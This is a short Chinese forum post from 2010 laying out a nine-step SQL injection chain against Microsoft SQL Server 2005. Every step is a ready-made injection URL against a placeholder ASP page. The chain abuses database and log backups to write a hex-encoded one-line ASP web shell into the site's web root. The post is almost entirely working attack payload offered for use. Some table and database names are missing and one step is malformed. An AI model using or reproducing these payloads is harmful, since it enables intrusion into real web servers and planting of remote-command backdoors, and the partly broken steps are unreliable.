韩小末 发表于 2010-2-2 21:36:07

MSSQL 2005 Backup log shell

第一步
http://www.sb.com/test.asp';alter/**/database/**//**/set/**/recovery/**/full--

第二步:
http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**//**/to/**/disk%3D@d/**/with/**/init--

第三步
http://www.sb.com/test.asp';drop/**/table/**/--

第四步
http://www.sb.com/test.asp';create/**/table/**/(/**/image)--

第五步
http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**//**/to/**/disk%3D@d/**/with/**/init--

第六步
http://www.sb.com/test.asp';insert/**/into/**/()/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--

第七步
http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**//**/to/**/disk%3D@d/**/with/**/init--

第八步
http://www.sb.com/test.asp';drop/**/table/**/--

第九步
http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**//**/to/**/disk%3D@d/**/with/**/init--
页: [1]
查看完整版本: MSSQL 2005 Backup log shell